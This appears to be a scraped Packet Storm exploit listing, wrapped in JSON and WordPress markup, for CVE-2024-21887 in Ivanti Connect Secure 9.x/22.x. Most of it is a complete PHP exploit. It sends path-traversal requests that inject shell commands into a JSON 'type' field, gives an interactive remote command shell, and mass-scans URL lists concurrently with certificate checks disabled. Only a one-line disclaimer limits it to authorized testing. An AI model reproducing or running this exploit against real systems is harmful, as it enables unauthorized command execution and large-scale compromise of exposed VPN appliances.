{“lastseen”:”2026-01-27T17:14:53″,”description”:”The provided PHP script targets CVE\u20112024\u201121887, a command injection vulnerability in Ivanti Connect Secure versions 9.x and 22.x It is designed to identify and exploit vulnerable systems through a crafted API request. It initializes a reusable cURL…”,”published”:”2026-01-27T00:00:00″,”modified”:”2026-01-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Ivanti Connect Secure 9.x \/ 22.x Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214426″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-21887″],”sourceData”:”=============================================================================================================================================\\n | # Title : Ivanti Connect Secure 9.x and 22.x. Exploit and Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.ivanti.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213670\/ \\u0026 CVE-2024-21887\\n \\n [+] Summary : The provided PHP script targets CVE\u20112024\u201121887 and is designed to identify and exploit vulnerable systems through a crafted API request. \\n It initializes a reusable cURL session to send malicious JSON payloads to a specific endpoint, abusing path traversal and improper input handling.\\n \\n [+] Key features of the script include:\\n \\n Single\u2011target and bulk scanning modes (URL or file-based).\\n \\n Vulnerability detection by analyzing JSON error responses from the server.\\n \\n An interactive shell mechanism that attempts to execute arbitrary commands by injecting them into request parameters.\\n \\n Concurrent scanning using curl_multi for faster processing of multiple targets.\\n \\n Optional logging of vulnerable URLs to an output file.\\n \\n [+] Overall, the script goes beyond passive detection and includes active exploitation logic, making it suitable only for controlled, authorized security testing environments.\\t\\n \\n [+] PoC : php poc.php -u https:\/\/example.com\\n \\n -f urls.txt -t 20 -o results.txt\\n \\n \\u003c?php\\n \\n class CVE_2024_21887 {\\n private $base_url;\\n private $session;\\n \\n public function __construct($base_url) {\\n $this-\\u003ebase_url = $base_url;\\n $this-\\u003esession = curl_init();\\n curl_setopt($this-\\u003esession, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($this-\\u003esession, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($this-\\u003esession, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($this-\\u003esession, CURLOPT_TIMEOUT, 10);\\n curl_setopt($this-\\u003esession, CURLOPT_FOLLOWLOCATION, true);\\n }\\n \\n public function send_backup_code_request($type_value = \\”id\\”) {\\n $data = json_encode([\\”type\\” =\\u003e \\”;{$type_value};\\”]);\\n $url = $this-\\u003ebase_url . \\”\/api\/v1\/totp\/user-backup-code\/%2E%2E\/%2E%2E\/system\/maintenance\/archiving\/cloud-server-test-connection\\”;\\n \\n curl_setopt($this-\\u003esession, CURLOPT_URL, $url);\\n curl_setopt($this-\\u003esession, CURLOPT_POST, true);\\n curl_setopt($this-\\u003esession, CURLOPT_POSTFIELDS, $data);\\n curl_setopt($this-\\u003esession, CURLOPT_HTTPHEADER, [\\n ‘Content-Type: application\/json’,\\n ‘Content-Length: ‘ . strlen($data)\\n ]);\\n \\n $response = curl_exec($this-\\u003esession);\\n $http_code = curl_getinfo($this-\\u003esession, CURLINFO_HTTP_CODE);\\n $content_type = curl_getinfo($this-\\u003esession, CURLINFO_CONTENT_TYPE);\\n \\n if ($http_code \\u003e= 200 \\u0026\\u0026 $http_code \\u003c 300 \\u0026\\u0026 strpos($content_type, ‘application\/json’) !== false) {\\n $response_data = json_decode($response, true);\\n if (isset($response_data[‘error’])) {\\n return $response_data[‘error’];\\n }\\n }\\n \\n return null;\\n }\\n \\n public function check_vulnerability() {\\n $error_message = $this-\\u003esend_backup_code_request();\\n if ($error_message) {\\n echo \\”[+] \\” . $this-\\u003ebase_url . \\” is vulnerable – \\” . $error_message . PHP_EOL;\\n return $error_message;\\n }\\n return null;\\n }\\n \\n public function interactive_shell() {\\n echo \\”[!] Shell is ready, please type your commands UwU\\” . PHP_EOL;\\n \\n while (true) {\\n echo \\”# \\”;\\n $cmd = trim(fgets(STDIN));\\n \\n if (strtolower($cmd) === ‘exit’) {\\n break;\\n } elseif (strtolower($cmd) === ‘clear’) {\\n system(‘clear’);\\n continue;\\n }\\n \\n $response = $this-\\u003esend_backup_code_request($cmd);\\n if ($response) {\\n echo $response . PHP_EOL;\\n }\\n }\\n }\\n \\n public function __destruct() {\\n curl_close($this-\\u003esession);\\n }\\n }\\n \\n function process_url($url, $output_file = null) {\\n $scanner = new CVE_2024_21887($url);\\n if ($scanner-\\u003echeck_vulnerability()) {\\n if ($output_file) {\\n file_put_contents($output_file, $url . PHP_EOL, FILE_APPEND);\\n }\\n return $url;\\n }\\n return null;\\n }\\n \\n function main($argv) {\\n $shortopts = \\”u:f:t:o:h\\”;\\n $longopts = [\\n \\”url:\\”,\\n \\”file:\\”,\\n \\”threads:\\”,\\n \\”output:\\”,\\n \\”help\\”\\n ];\\n \\n $options = getopt($shortopts, $longopts);\\n \\n if (isset($options[‘h’]) || isset($options[‘help’]) || count($argv) == 1) {\\n echo \\”CVE-2024-21887 Exploit Script\\” . PHP_EOL;\\n echo \\”This script is designed to detect and interact with systems vulnerable to CVE-2024-21887.\\” . PHP_EOL . PHP_EOL;\\n echo \\”Options:\\” . PHP_EOL;\\n echo \\” -u, –url Specify a single URL to scan. Use this mode for a focused scan on one target.\\” . PHP_EOL;\\n echo \\” -f, –file Specify a file path containing a list of URLs for bulk scanning.\\” . PHP_EOL;\\n echo \\” Each URL should be on a new line.\\” . PHP_EOL;\\n echo \\” -t, –threads Set the number of concurrent threads for bulk scanning. Default is 10.\\” . PHP_EOL;\\n echo \\” -o, –output Specify a file path to save the URLs that are found to be vulnerable.\\” . PHP_EOL;\\n echo \\” Results are appended to this file in real time.\\” . PHP_EOL;\\n echo \\” -h, –help Show this help message\\” . PHP_EOL;\\n return;\\n }\\n \\n if (isset($options[‘u’]) || isset($options[‘url’])) {\\n $url = $options[‘u’] ?? $options[‘url’];\\n $scanner = new CVE_2024_21887($url);\\n if ($scanner-\\u003echeck_vulnerability()) {\\n $scanner-\\u003einteractive_shell();\\n }\\n } elseif (isset($options[‘f’]) || isset($options[‘file’])) {\\n $file = $options[‘f’] ?? $options[‘file’];\\n $threads = isset($options[‘t’]) ? (int)$options[‘t’] : (isset($options[‘threads’]) ? (int)$options[‘threads’] : 10);\\n $output = $options[‘o’] ?? $options[‘output’] ?? null;\\n \\n if (!file_exists($file)) {\\n echo \\”Error: File not found: \\” . $file . PHP_EOL;\\n return;\\n }\\n \\n $urls = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n $total = count($urls);\\n $processed = 0;\\n \\n echo \\”Scanning \\” . $total . \\” URLs with \\” . $threads . \\” threads…\\” . PHP_EOL;\\n \\n \/\/ Simplified threading implementation using curl_multi\\n $mh = curl_multi_init();\\n $handles = [];\\n $results = [];\\n \\n \/\/ Function to process completed requests\\n function process_completed_requests(\\u0026$mh, \\u0026$handles, \\u0026$results, \\u0026$processed, $total, $output) {\\n while ($info = curl_multi_info_read($mh)) {\\n $ch = $info[‘handle’];\\n $url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);\\n \\n if ($info[‘result’] == CURLE_OK) {\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $response = curl_multi_getcontent($ch);\\n \\n if ($http_code \\u003e= 200 \\u0026\\u0026 $http_code \\u003c 300) {\\n $response_data = json_decode($response, true);\\n if (isset($response_data[‘error’])) {\\n echo \\”[+] \\” . $url . \\” is vulnerable – \\” . $response_data[‘error’] . PHP_EOL;\\n if ($output) {\\n file_put_contents($output, $url . PHP_EOL, FILE_APPEND);\\n }\\n $results[] = $url;\\n }\\n }\\n }\\n \\n curl_multi_remove_handle($mh, $ch);\\n curl_close($ch);\\n unset($handles[array_search($ch, $handles, true)]);\\n \\n $processed++;\\n echo \\”\\\\rProgress: \\” . $processed . \\”\/\\” . $total . \\” (\\” . round(($processed\/$total)*100, 1) . \\”%)\\”;\\n }\\n }\\n \\n \/\/ Initialize requests\\n foreach ($urls as $url) {\\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url . \\”\/api\/v1\/totp\/user-backup-code\/%2E%2E\/%2E%2E\/system\/maintenance\/archiving\/cloud-server-test-connection\\”,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e json_encode([\\”type\\” =\\u003e \\”;id;\\”]),\\n CURLOPT_HTTPHEADER =\\u003e [\\n ‘Content-Type: application\/json’\\n ]\\n ]);\\n \\n curl_multi_add_handle($mh, $ch);\\n $handles[] = $ch;\\n \\n \/\/ If we’ve reached the thread limit, process some requests\\n if (count($handles) \\u003e= $threads) {\\n do {\\n curl_multi_exec($mh, $running);\\n process_completed_requests($mh, $handles, $results, $processed, $total, $output);\\n } while ($running \\u003e 0 \\u0026\\u0026 count($handles) \\u003e= $threads);\\n }\\n }\\n \\n \/\/ Process remaining requests\\n do {\\n curl_multi_exec($mh, $running);\\n curl_multi_select($mh);\\n process_completed_requests($mh, $handles, $results, $processed, $total, $output);\\n } while ($running \\u003e 0);\\n \\n curl_multi_close($mh);\\n \\n echo PHP_EOL . \\”Scan completed. Found \\” . count($results) . \\” vulnerable URLs.\\” . PHP_EOL;\\n if ($output) {\\n echo \\”Vulnerable URLs saved to \\” . $output . PHP_EOL;\\n }\\n }\\n }\\n \\n if (PHP_SAPI === ‘cli’) {\\n main($argv);\\n }\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214426″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”baseScore”:9.1,”baseSeverity”:”CRITICAL”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”HIGH”,”userInteraction”:”NONE”,”scope”:”CHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/214426\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-27T17:14:53″,”description”:”The provided PHP script targets CVE\u20112024\u201121887, a command injection vulnerability in Ivanti Connect Secure versions 9.x and 22.x It is designed to identify and exploit…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-37576","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n